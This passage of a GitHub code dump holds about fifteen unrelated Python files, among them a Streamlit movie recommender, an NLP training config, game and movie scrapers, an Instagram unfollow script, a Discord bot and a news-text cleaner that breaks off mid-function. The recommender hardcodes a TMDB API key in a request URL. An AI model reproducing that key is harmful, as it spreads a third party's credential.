result in string to a dict object.\n\n @param result: a list of warnings in string\n @return: a dict of warnings\n \"\"\"\n warnings = {}\n currentModule = None\n warningsCurrentModule = []\n for line in result.splitlines():\n if line.startswith(self.prefixModuleName):\n # Save results for previous module\n if currentModule:\n warnings[currentModule] = set(warningsCurrentModule)\n # Initial results for current module\n moduleName = line.replace(self.prefixModuleName, \"\")\n currentModule = moduleName\n warningsCurrentModule = []\n elif re.search(self.regexLineStart, line):\n warningsCurrentModule.append(line)\n else:\n if warningsCurrentModule:\n warningsCurrentModule[-1] += \"\\n\" + line\n # Save warnings for last module\n if currentModule:\n warnings[currentModule] = set(warningsCurrentModule)\n return warnings\n\n\n def formatWarnings(self, warnings):\n \"\"\"\n Format warnings to a list of results.\n\n @param warnings: a dict of warnings produced by parseWarnings\n @return: a list of warnings in string\n \"\"\"\n lines = []\n for modulename in sorted(warnings):\n lines.append(self.prefixModuleName + modulename)\n lines.extend(sorted(warnings[modulename],\n key=lambda x: x.split(\":\")[1]))\n\n return \"\\n\".join(lines)\n\n\ndef main():\n \"\"\"\n An entry point used in the setup.py to create a runnable script.\n \"\"\"\n runner = Runner()\n runner.run(sys.argv[1:])\n","repo_name":"twisted/twistedchecker","sub_path":"twistedchecker/core/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"24265069955","text":"import streamlit as st\nimport pickle\nimport pandas as pd\nimport requests\n\nmovies_dict = pickle.load(open('model/movie_dict.pkl','rb'))\nmovies = pd.DataFrame(movies_dict)\n\nsimilarity = pickle.load(open('model/similarity.pkl','rb'))\n\n\n\ntry:\n def fetch_poster(movie_id):\n url = \"https://api.themoviedb.org/3/movie/{}?api_key=8265bd1679663a7ea12ac168da84d2e8&language=en-US\".format(movie_id)\n data = requests.get(url)\n data = data.json()\n poster_path = data['poster_path']\n full_path = \"https://image.tmdb.org/t/p/w500/\" + poster_path\n return full_path\n\n def recommend(movie):\n movie_index = movies[movies['title']==movie].index[0]\n distances = similarity[movie_index]\n movies_list=sorted(list(enumerate(distances)), reverse=True, key=lambda x:x[1])[1:6]\n recommended_movies = []\n recommended_movies_posters =[]\n for i in movies_list:\n movie_id =movies.iloc[i[0]].movie_id\n recommended_movies.append(movies.iloc[i[0]].title)\n\n # fetch poster from API\n recommended_movies_posters.append(fetch_poster(movie_id))\n return recommended_movies, recommended_movies_posters\n\n st.header('Movie Recommender System ')\n selected_movie_name =st.selectbox(\n 'mr_pankajpandey_',\n movies['title'].values)\n\n if st.button('Recommend'):\n names, posters = recommend(selected_movie_name)\n col1, col2, col3, col4, col5 = st.columns(5)\n with col1:\n st.text(names[0])\n st.image(posters[0])\n with col2:\n st.text(names[1])\n st.image(posters[1])\n\n with col3:\n st.text(names[2])\n st.image(posters[2])\n with col4:\n st.text(names[3])\n st.image(posters[3])\n with col5:\n st.text(names[4])\n st.image(posters[4])\n st.divider()\n\nexcept:\n st.warning('API Error ', icon=\"⚠️\")\nhtml_string = \"

    Made with @mrpankajpandey_\n\n\n
    Github account :- mrpankajpandey\"\nst.markdown(html_string, unsafe_allow_html=True)","repo_name":"mrpankajpandey/movie-recommender-system-ML","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29975915739","text":"import string\nimport random\n\ncommon = {\n \"exp_name\": \"duie2\", # ace05_lu\n \"rel2id\": \"rel2id.json\",\n \"ent2id\": \"ent2id.json\",\n \"device_num\": 1,\n# \"encoder\": \"BiLSTM\",\n \"encoder\": \"BERT\", \n \"hyper_parameters\": {\n \"shaking_type\": \"cln_plus\",\n \"inner_enc_type\": \"lstm\",\n # match_pattern: only_head_text (nyt_star, webnlg_star), whole_text (nyt, webnlg), only_head_index, whole_span, event_extraction\n \"match_pattern\": \"whole_text\", \n },\n}\ncommon[\"run_name\"] = \"{}+{}+{}\".format(\"TP2\", common[\"hyper_parameters\"][\"shaking_type\"], common[\"encoder\"]) + \"\"\n\nrun_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))\ntrain_config = {\n \"train_data\": \"train_data.json\",\n \"valid_data\": \"valid_data.json\",\n \"rel2id\": \"rel2id.json\",\n \"logger\": \"wandb\", # if wandb, comment the following four lines\n \n# # if logger is set as default, uncomment the following four lines and comment the line above\n# \"logger\": \"default\", \n# \"run_id\": run_id,\n# \"log_path\": \"./default_log_dir/default.log\",\n# \"path_to_save_model\": \"./default_log_dir/{}\".format(run_id),\n\n # when to save the model state dict\n \"f1_2_save\": 0,\n # whether train_config from scratch\n \"fr_scratch\": True,\n # write down notes here if you want, it will be logged\n \"note\": \"start from scratch\",\n # if not fr scratch, set a model_state_dict\n \"model_state_dict_path\": \"\", # valid only if \"fr_scratch\" is False\n \"hyper_parameters\": {\n \"batch_size\": 32,\n \"epochs\": 100,\n \"seed\": 2333,\n \"log_interval\": 10,\n \"max_seq_len\": 128,\n \"sliding_len\": 20,\n \"scheduler\": \"CAWR\", # Step\n \"ghm\": False, # set True if you want to use GHM to adjust the weights of gradients, this will speed up the training process and might improve the results. (Note that ghm in current version is unstable now, may hurt the results)\n \"tok_pair_sample_rate\": 1, # (0, 1] How many percent of token paris you want to sample for training, this would slow down the training if set to less than 1. 
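`recommend()` in the Streamlit record above is a plain nearest-neighbour lookup in a precomputed similarity matrix. A minimal sketch of just that lookup, assuming numpy; the toy titles and matrix are illustrative stand-ins for the pickled artifacts:

```python
import numpy as np

titles = ["Avatar", "Titanic", "Inception", "Interstellar", "Memento"]
similarity = np.array([
    [1.0, 0.2, 0.4, 0.5, 0.1],
    [0.2, 1.0, 0.3, 0.2, 0.1],
    [0.4, 0.3, 1.0, 0.6, 0.7],
    [0.5, 0.2, 0.6, 1.0, 0.3],
    [0.1, 0.1, 0.7, 0.3, 1.0],
])

def recommend(title, k=2):
    i = titles.index(title)
    order = np.argsort(similarity[i])[::-1]   # most similar first
    return [titles[j] for j in order if j != i][:k]  # skip the query itself

assert recommend("Inception") == ["Memento", "Interstellar"]
```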
It is only helpful when your GPU memory is not enought for the training.\n },\n}\n\neval_config = {\n \"model_state_dict_dir\": \"./wandb\", # if use wandb, set \"./wandb\", or set \"./default_log_dir\" if you use default logger\n \"run_ids\": [\"1a70p109\", ],\n \"last_k_model\": 1,\n \"test_data\": \"*test*.json\", # \"*test*.json\"\n \n # results\n \"save_res\": False,\n \"save_res_dir\": \"../results\",\n \n # score: set true only if test set is tagged\n \"score\": True,\n \n \"hyper_parameters\": {\n \"batch_size\": 32,\n \"force_split\": False,\n \"max_seq_len\": 512,\n \"sliding_len\": 50,\n },\n}\n\nbert_config = {\n \"data_home\": \"../data4bert\",\n \"bert_path\": \"../../pretrained_models/chinese-bert-wwm-ext-hit\", # bert-base-cased, chinese-bert-wwm-ext-hit\n \"hyper_parameters\": {\n \"lr\": 5e-5,\n },\n}\nbilstm_config = {\n \"data_home\": \"../data4bilstm\",\n \"token2idx\": \"token2idx.json\",\n \"pretrained_word_embedding_path\": \"../../pretrained_emb/glove_300_nyt.emb\",\n \"hyper_parameters\": {\n \"lr\": 1e-3,\n \"enc_hidden_size\": 300,\n \"dec_hidden_size\": 600,\n \"emb_dropout\": 0.1,\n \"rnn_dropout\": 0.1,\n \"word_embedding_dim\": 300,\n },\n}\n\ncawr_scheduler = {\n # CosineAnnealingWarmRestarts\n \"T_mult\": 1,\n \"rewarm_epoch_num\": 2,\n}\nstep_scheduler = {\n # StepLR\n \"decay_rate\": 0.999,\n \"decay_steps\": 100,\n}\n\n# ---------------------------dicts above is all you need to set---------------------------------------------------\nif common[\"encoder\"] == \"BERT\":\n hyper_params = {**common[\"hyper_parameters\"], **bert_config[\"hyper_parameters\"]}\n common = {**common, **bert_config}\n common[\"hyper_parameters\"] = hyper_params\nelif common[\"encoder\"] == \"BiLSTM\":\n hyper_params = {**common[\"hyper_parameters\"], **bilstm_config[\"hyper_parameters\"]}\n common = {**common, **bilstm_config}\n common[\"hyper_parameters\"] = hyper_params\n \nhyper_params = {**common[\"hyper_parameters\"], **train_config[\"hyper_parameters\"]}\ntrain_config = {**train_config, **common}\ntrain_config[\"hyper_parameters\"] = hyper_params\nif train_config[\"hyper_parameters\"][\"scheduler\"] == \"CAWR\":\n train_config[\"hyper_parameters\"] = {**train_config[\"hyper_parameters\"], **cawr_scheduler}\nelif train_config[\"hyper_parameters\"][\"scheduler\"] == \"Step\":\n train_config[\"hyper_parameters\"] = {**train_config[\"hyper_parameters\"], **step_scheduler}\n \nhyper_params = {**common[\"hyper_parameters\"], **eval_config[\"hyper_parameters\"]}\neval_config = {**eval_config, **common}\neval_config[\"hyper_parameters\"] = hyper_params","repo_name":"131250208/TPlinker-joint-extraction","sub_path":"tplinker_plus/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"18"} +{"seq_id":"70578845159","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\n\nfrom code.shared_functions import skip_echo\n\ndef display():\n c1, c2 = st.columns([9,1])\n c1.title(\"Un ejemplo simple\")\n show_code = c2.checkbox(\"Código\")\n\n with st.echo(\"above\") if show_code else skip_echo():\n c1, c2 = st.columns([4, 6])\n # Columna izquierda\n with c1:\n st.image(\"images/ejemplo_simple.png\")\n # Columna derecha\n with c2:\n st.markdown(\"## Pregunta #1\")\n st.markdown(\"### ¿Cómo harían una página web que:\")\n st.markdown(f\"#### {' '*5} permitiera cargar una foto, \")\n st.markdown(f\"#### {' '*10} la convirtiera a escala de grises, \")\n 
st.markdown(f\"#### {' '*15} mostrara la imagen resultante,\")\n st.markdown(f\"#### {' '*20} y permitiera descargarla?\")\n st.markdown(\"\")\n st.markdown(\"## Pregunta #2\")\n st.markdown(\"#### ¿Cuántas líneas de código creen que debería tomar eso?\")\n","repo_name":"sebastiandres/talk_2021_11_pyconcl","sub_path":"slides/slide_10_ejemplo_webapp_simple.py","file_name":"slide_10_ejemplo_webapp_simple.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"19078112590","text":"#User function Template for python3\r\n\r\n\r\n\r\nclass Solution:\r\n def arranged(self,a,n):\r\n \r\n possitive_list = []\r\n negative_list = []\r\n \r\n for i in a:\r\n if i >= 0:\r\n possitive_list.append(i)\r\n else:\r\n negative_list.append(i)\r\n \r\n new_arr = []\r\n \r\n for j in range(len(possitive_list)):\r\n new_arr.append(possitive_list[j])\r\n new_arr.append(negative_list[j])\r\n \r\n a[:] = new_arr\r\n return new_arr\r\n \r\n \r\n \r\n\r\n\r\n#{ \r\n # Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\n\r\n\r\nt=int(input())\r\nfor _ in range(0,t):\r\n n=int(input())\r\n a=list(map(int,input().split()))\r\n ans=Solution().arranged(a,n)\r\n print(*ans)\r\n\r\n# } Driver Code Ends\r\n","repo_name":"AshwinHarishP/GeeksforGeeks","sub_path":"Python Coding Practice/Positive and negative element.py","file_name":"Positive and negative element.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9402360135","text":"import typer\n\nfrom src.database_commander import DatabaseCommander\nfrom src.logger_handler import LoggerHandler\n\n_logger = LoggerHandler(\"clear_module\")\n\n\ndef clear_local_database():\n \"\"\"Removes the recipes, ingredients, links between them as well as entered bottles\"\"\"\n typer.confirm(\n \"Delete local Database Data? This includes recipes and ingredients. 
A backup will be created before deletion.\",\n abort=True\n )\n local_db = DatabaseCommander()\n local_db.create_backup()\n local_db.delete_database_data()\n _logger.log_event(\"INFO\", \"Data in local database was deleted by command.\")\n typer.echo(\n typer.style(\n \"Local database is clean, time to enter new recipes\",\n fg=typer.colors.GREEN, bold=True\n ))\n","repo_name":"AndreWohnsland/CocktailBerry","sub_path":"src/programs/clearing.py","file_name":"clearing.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"18"} +{"seq_id":"16875726030","text":"\n\nif __name__ == '__main__':\n # Num = [1]\n # Den = [1, 3, -20]\n system2 = MySystem([1], [-1, 1], TF_Feed=0.6)\n # instance= MySystem(Num, Den, TF_Feed = 1)\n # print(instance.is_stable_by_poles_method())\n # # instance.plot_impuls_response()\n # # instance.plot_step_response()\n # # instance.plot_bode_diagramme()\n # # instance.is_stable_by_poles_method(\n # # instance.plot_nyquist_diagramme() \n # instance.plot_step_response()\n # S = step_info(instance.TF)\n # for k in S:\n # print(f\"{k}: {S[k]}\")\n\n # # nichols(TransferFunction(Num, Den))\n # # # print(tf2ss(instance.TF))\n # # plt.show()\n sys = StateSpace([[-1., -1.],\n [1., 0.]],\n [[-1./np.sqrt(2.), 1./np.sqrt(2.)],\n [0, 0]],\n [[np.sqrt(2.), -np.sqrt(2.)]],\n [[0, 0]])\n # # t,y = step_response(system2)\n # # plt.plot(t, y[0][1])\n # plt.xlabel('Time [s]')\n # plt.ylabel('Amplitude')\n # plt.title('Step response')\n # plt.grid()\n # plt.show()\n\n system2.plot_step_response()","repo_name":"RedhaZid35/Control_Systems_Analyzer","sub_path":"__1/OLD/TrFunc.py","file_name":"TrFunc.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18178498483","text":"from database.Database import Database\nfrom instagram_util.InstaUtil import InstaUtil\n\n\ndbAPI = Database()\n\nfor project in dbAPI.get_projects():\n account = None\n try:\n account = dbAPI.get_next_insta_user_to_unfollow(project.project_id)\n insta_util = InstaUtil(project.insta_config)\n insta_util.unfollow(account.user_id)\n except Exception as e:\n print(e)\n finally:\n if account is not None:\n dbAPI.record_insta_unfollow(account)","repo_name":"pabloi09/reddit_reposter","sub_path":"reposter/batch_processes/insta_unfollower.py","file_name":"insta_unfollower.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6784150855","text":"\"\"\"Scrapes a WC3 game history page from battlenet and returns json.\"\"\"\nfrom helpers import wash_player_name\nfrom config import data_positions_history\nfrom urllib.parse import parse_qs\nimport pandas as pd\nimport json\nfrom bnet_page import BnetPage\nfrom profile_page import ProfilePage\n\n\nclass HistoryPage(BnetPage):\n def __init__(self, player, server, page=1):\n url = 'http://classic.battle.net/war3/ladder/w3xp-player-logged-games.aspx'\n params = {'PlayerName': player, 'PageNo': page, 'Gateway': server}\n super().__init__(server, url, params)\n self.player = player\n self.page = page\n\n @property\n def game_containers(self):\n return self.soup.find('table', id='tblGames').find_all('tr', class_='rankingRow')\n\n @property\n def games(self):\n for game in self.game_containers:\n yield Game(self.player, game).parse()\n\n @property\n def next_page(self):\n url = 
None\n        link = self.soup.find(text='Next\xa0Page')\n        if link is not None:\n            url = link.parent.get('href')\n        if url is not None:\n            next_page = parse_qs(url.split('?', 1)[-1]).get('PageNo')[0]\n            return int(next_page)\n\n\nclass Game:\n    def __init__(self, player, soup):\n        self.player = player\n        self.soup = soup\n\n    def parse(self):\n        values = self.soup.find_all(['td'])\n        values = [x.get_text().strip() for x in values]\n        data = self.parse_values(values)\n        game_id = self.soup.find_all(['td'])[0].a.get('href').split('&GameID=')[1]\n        data['game_id'] = int(game_id)\n        data['team_one'].append(self.player)\n\n        for players in ['team_one', 'team_two']:\n            data[players] = [wash_player_name(player) for player in data[players]]\n\n        if data['winner'] == 'Win':\n            data['winner'] = data['team_one']\n        elif data['winner'] == 'Tie':\n            data['winner'] = None\n        else:\n            data['winner'] = data['team_two']\n\n        return data\n\n    @staticmethod\n    def parse_values(values):\n        data = {}\n        for field, meta_data in data_positions_history.items():\n            i = meta_data['position']\n            v = values[i]\n            formatter = meta_data['function']\n            if formatter:\n                value = formatter(v)\n                data[field] = value\n\n        return data\n\n\nif __name__ == '__main__':\n    print('-- Testing --')\n    players = [\n        {\n            'player': 'Fithydenk',\n            'server': 'azeroth'\n        }\n        # {\n        #     'player': 'romantichuman',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'followgrubby',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'nightend',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'tanymommy',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'ilovenecropolis',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'alanford',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': '123456789012345',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'ZveroBoy',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'Feanor',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'SyDe',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'Nicker59',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'rg-back2game',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'ukto',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'pieck',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'IamTry',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'MisterWinner',\n        #     'server': 'northrend'\n        # },\n        # {\n        #     'player': 'Pieck',\n        #     'server': 'azeroth'\n        # },\n        # {\n        #     'player': 'Cocaine.',\n        #     'server': 'azeroth'\n        # },\n        # {\n        #     'player': 'ALANFORD',\n        #     'server': 'Northrend'\n        # },\n    ]\n\n    for player in players:\n        page = 1\n        games_all = []\n\n        profile = ProfilePage(**player)\n        print(\"\\n{}\".format(profile))\n        while True:\n\n            history_page = HistoryPage(player.get('player'), player.get('server'), page)\n            games = list(history_page.games)\n            games_all.extend(games)\n            next_page = history_page.next_page\n            if next_page is None or next_page > 10 or page >= next_page:\n                break\n            page = next_page\n\n        df = pd.DataFrame(games_all)\n        print(\"Number of games found: {}\".format(len(df)))\n        print(\"Most recent game: {}\".format(df.loc[0, \"date\"]))\n\n        data = df.to_dict(orient='records')\n        for d in data:\n            print(d)\n        file_path = './data_backfill/partial/{}/{}.json'.format(\n            player.get('server'), player.get('player'))\n\n        with open(file_path, 'w') as f:\n            json.dump(data, f)\n","repo_name":"chrisdaly/wc3_bnet_scraping","sub_path":"wc3_profile_scraper/wc3_profile_scraper/history_page.py","file_name":"history_page.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10164170730","text":"import discord\nfrom discord.ext import commands\nimport random\n\ndescription = '''An example bot to showcase the discord.ext.commands extension\nmodule.\n\nThere are a number of utility commands being showcased here.'''\n\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='?',\n description=description,\n intents=intents)\n\nrules_message = '''\nWelcome to the server🎉 Please read the rules below:\n\n• You have to register on the gravitas'23 website. No external registrations will be accepted.\n• Make sure to \"Check-In\" to the Hybrid Cryptic Hunt through the official website. You will also have to check-in for everyone you have paid for.\n• You will not be able to use the app without checking in.\n• You will require a working internet connection throughout the hunt.\n• For some of the questions, you will also need access to a laptop.\n• To make a team on the app, one person must select the \"Create a Team\" button and share the code given with the rest of the group.\n'''\n\nq_format = '''\nFORMAT OF THE QUESTIONS:\n\nThere are two types of questions:\n• Text Based🖹 - You have to enter the text to solve the question.\n• QR Based🖼️- You must go to the location and solve the QR code that is hidden there\n'''\nq_points = '''\nPOINTS PER QUESTION\n1. Easy - 100 points\n2. Medium - 250 points\n3. Hard - 500 points\n\nHints💡 will also be available. The cost of using a hint is: \n50% of the points for an easy question😮\n20% of the points for a medium or hard question🤔\n'''\n\n\n@bot.event\nasync def on_ready():\n print(f'Logged in as {bot.user} (ID: {bot.user.id})')\n print('------')\n\n\n@bot.command()\nasync def rules(ctx):\n await ctx.send(rules_message)\n\n\n@bot.command()\nasync def type(ctx):\n await ctx.send(q_format)\n\n\n@bot.command()\nasync def points(ctx):\n await ctx.send(q_points)\n\n\n@bot.command()\nasync def add(ctx, left: int, right: int):\n \"\"\"Adds two numbers together.\"\"\"\n await ctx.send(left + right)\n\n\n@bot.group()\nasync def cool(ctx):\n \"\"\"Says if a user is cool.\n\n In reality this just checks if a subcommand is being invoked.\n \"\"\"\n if ctx.invoked_subcommand is None:\n await ctx.send(f'No, {ctx.subcommand_passed} is not cool')\n\n\n@cool.command(name='bot')\nasync def _bot(ctx):\n \"\"\"Is the bot cool?\"\"\"\n await ctx.send('Yes, the bot is cool.')\n\n\nbot.run(\n '')\n","repo_name":"adarshxs/discord-bot-acm","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22914343015","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n lth = len(nums)\n\n if lth <= 2:\n return max(nums)\n\n dp = [0] * lth\n\n dp[0] = nums[0]\n dp[1] = max(nums[0], nums[1])\n\n for i in range(2, lth):\n dp[i] = max(dp[i - 2] + nums[i], dp[i - 1])\n\n return dp[-1]\n","repo_name":"sigmarion1/daily-algo","sub_path":"leetcode-top-interview-150/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28011007929","text":"from university import *\nfrom data import *\nimport random as rnd\n\nclass Evaluation:\n def __init__(self):\n self._data = Data()\n self._classes = []\n self._problems = 0\n self._healthRate = -1\n self._classNumb = 0\n self._ishealthRateChanged = True\n\n def get_classes(self):\n 
self._ishealthRateChanged = True\n        return self._classes\n\n    def get_healthRate(self):\n        if (self._ishealthRateChanged == True):\n            self._healthRate = self.calculate_healthRate()\n            self._ishealthRateChanged = False\n        return self._healthRate\n\n\n    def initialize(self):\n        specs = self._data._specs\n        for i in range(0, len(specs)):\n            subjects = specs[i]._subjects\n            for j in range(0, len(subjects)):\n                newClass = Class(self._classNumb, specs[i], subjects[j])\n                self._classNumb = self._classNumb + 1\n                newClass._lessonTime = Data()._meetingTimes[rnd.randrange(0, len(Data()._meetingTimes))]\n                newClass._audience = Data()._rooms[rnd.randrange(0, len(Data()._rooms))]\n                newClass._teacher = subjects[j]._teachers[rnd.randrange(0, len(subjects[j]._teachers))]\n                self._classes.append(newClass)\n        return self\n\n\n    def calculate_healthRate(self):\n        self._problems = 0\n        classes = self.get_classes()\n        for i in range(0, len(classes)):\n            if (classes[i]._audience._places < classes[i]._subject._studentsMax):\n                self._problems += 1\n            for j in range(0, len(classes)):\n                if (j > i):\n                    if (classes[i]._lessonTime == classes[j]._lessonTime):\n                        if (classes[i]._audience == classes[j]._audience): self._problems += 1\n                        if (classes[i]._teacher == classes[j]._teacher): self._problems += 1\n        return 1 / ((1.0*self._problems + 1))\n\n\n    def __str__(self):\n        returnValue = \"\"\n        for i in range(0, len(self._classes)-1):\n            returnValue += str(self._classes[i]) + \", \"\n        returnValue += str(self._classes[len(self._classes)-1])\n        return returnValue\n","repo_name":"vrshchk/timetableGA","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35070549858","text":"import Request\nimport bs\nfrom pip._vendor import requests\nimport time\ndef askallurl():\n    url = 'https://movie.douban.com/j/chart/top_list?'\n    headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Core/1.94.175.400 QQBrowser/11.1.5155.400\"}\n    params = {\n        'type': '13',\n        'interval_id': '100:90',\n        'action': '',\n        'start': '0',\n        'limit': '500'\n    }\n    try:\n        response = requests.get(url,params = params,headers = headers)\n    except Exception as e:\n        print(e)\n        return \"\"\n    return response.json()\ndef main():\n    start = time.time()\n    datalist = []\n    movielist = askallurl()\n    for movie in movielist:\n        # print the URL of each sub-page being crawled\n        print(movie['url'])\n        html = Request.request(movie['url'])\n        # print('html'+html)\n        data = bs.beautifulSoup(html)\n        if(data != ''):\n            datalist.append(data)\n    end = time.time()\n    print(\"Crawler elapsed time: {} s\".format(end - start))\n    #print(datalist)\n    return datalist\nif __name__ == '__main__':\n    main()","repo_name":"zjczdzs/pythonCarlwer","sub_path":"main/GetALLSpider.py","file_name":"GetALLSpider.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7615159004","text":"import os, nltk, re\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.lancaster import LancasterStemmer\nfrom nltk.stem import WordNetLemmatizer\nimport timeit\nfrom Helpers.Logging import Critical, Info, Debug\nimport string\nfrom Stock_News_Analysis.Clean_Data.Possible_Stock_Names import get_all_stocks_possible_names\n\nPorter_Stemmer = PorterStemmer()\nLancaster_Stemmer = LancasterStemmer()\nWordNet_Lemmatizer = 
WordNetLemmatizer()\nRoot_Dir = \"C:/Users/nandpara/PycharmProjects/Machine_Learning1\"\nFiltered_News_File_Dir = Root_Dir + '/Market/Nse_Modules/News_Files/'\nCleaned_News_File = os.path.join(os.path.dirname(__file__), 'Cleaned_News_File.txt')\nDebug(Filtered_News_File_Dir)\nFrom_Line = 0\nTo_Line = 999999\n\nclass Clean_News_Data():\n    \"\"\"\n    Below Steps are followed to clean data\n    1.Each word\n    2.lowercase - already stored in lower case\n    3.remove punctuations\n    4.filter stopwords\n    5.lemmatize - map to root word\n    \"\"\"\n    def __init__(self, Date):\n        self.Date = Date\n        Filtered_News_File = Filtered_News_File_Dir + Date + \"_filtered_news_file.txt\"\n        self.News_File_Opened = open(Filtered_News_File, 'r+')\n        News = self.Make_News_File_generator(self.News_File_Opened)\n        Cleaned_News_list = self.Remove_Punctuations_and_If_Alpha(News)\n        Filtered_News = self.Filter_Stop_words(Cleaned_News_list)\n        Stem_Words_News_List = self.Get_Stem_Words(Filtered_News)\n        Lemmatize_News_Words_List = self.Lemmatize_News_Words(Stem_Words_News_List)\n        Cleaned_News = self.Remove_Stock_Names_From_News(Lemmatize_News_Words_List)\n        self.Store_Cleaned_News(set(Lemmatize_News_Words_List))\n\n    def Log_It(self, *args):\n        for arg in args:\n            Debug(arg)\n\n    def Store_Cleaned_News(self, Lemmatize_News_Words_List):\n        Cleaned_News_File = os.path.join(os.path.dirname(__file__), \"Cleaned_Files/\" + self.Date + \"_Cleaned_News.txt\")\n        clean_news_file = open(Cleaned_News_File, 'w+')\n        for clean_news in Lemmatize_News_Words_List:\n            clean_news_file.write(clean_news +'\\n')\n        clean_news_file.close()\n\n    def Make_News_File_generator(self, New_File_Opened):\n        \"\"\"\n        Reads File and makes a list of all lines, removing \"\\n\" at each line end\n        :param File_Path:\n        :return: generator of file list\n        \"\"\"\n\n        yield [line.strip() for line in New_File_Opened.readlines()]\n\n\n    def Remove_Punctuations_and_If_Alpha(self, News):\n        \"\"\"\n        splits each news line into words\n        removes punctuations\n        :param News:\n        :return:\n        \"\"\"\n        Cleaned_News_list = []\n        # use the built-in next() so this works on Python 3 generators as well\n        for each_line in next(News)[From_Line:To_Line]:\n\n            list_of_alpha_words = [word for word in word_tokenize(each_line)\n                                   if word not in string.punctuation]\n            Cleaned_News = \" \".join([word.strip(\"'\") for word in list_of_alpha_words])\n            Cleaned_News_list.append(Cleaned_News)\n            self.Log_It(\"Remove_Punctuations_and_If_Alpha\",\n                        each_line, list_of_alpha_words, Cleaned_News)\n        return Cleaned_News_list\n\n    def Filter_Stop_words(self, Cleaned_News_list):\n        \"\"\"\n        Filters the stop words using nltk stopwords\n        removes numbers as well\n        :param Cleaned_News_list:\n        :return:\n        \"\"\"\n        Filtered_News_List = []\n        for each_news in Cleaned_News_list:\n            each_news = re.sub('-', \" \", each_news)\n            each_word_list = [word for word in word_tokenize(each_news)\n                              if len(word) > 1 ]\n            removed_stop_words = [word for word in each_word_list\n                                  if word not in stopwords.words('english')\n                                  if word.isalpha()]\n            Filtered_News = \" \".join(removed_stop_words)\n            Filtered_News_List.append(Filtered_News)\n            self.Log_It(\"Filter_Stop_words\", each_news, each_word_list, Filtered_News)\n        return Filtered_News_List\n\n    def Get_Stem_Words(self, Filtered_News_List):\n        Stem_Words_News_List = []\n        for each_news in Filtered_News_List:\n            tmp_news = each_news\n            news_words = word_tokenize(each_news)\n            self.Log_It(\"Get_Stem_Words\", each_news, news_words)\n            for each_word in news_words:\n                stem_word = Porter_Stemmer.stem(each_word)\n                tmp_news = re.sub(each_word, stem_word, tmp_news)\n            Stem_Words_News_List.append(tmp_news)\n            self.Log_It(tmp_news)\n\n        return Stem_Words_News_List\n\n    def Lemmatize_News_Words(self, Stem_Words_News_List):\n        Lemmatize_News_Words_List = []\n        for each_news in Stem_Words_News_List:\n            tmp_news = each_news\n            news_words = word_tokenize(each_news)\n            self.Log_It(\"Lemmatize_News_Words\",each_news, news_words)\n            for each_word in news_words:\n                lemma_word = WordNet_Lemmatizer.lemmatize(each_word)\n                tmp_news = re.sub(each_word, lemma_word, tmp_news)\n            Lemmatize_News_Words_List.append(tmp_news)\n            self.Log_It(tmp_news)\n        return Lemmatize_News_Words_List\n\n    def Remove_Stock_Names_From_News(self, Lemmatize_News_Words_List):\n        all_stocks_possible_names = get_all_stocks_possible_names()\n        Cleaned_News = []\n        for each_news 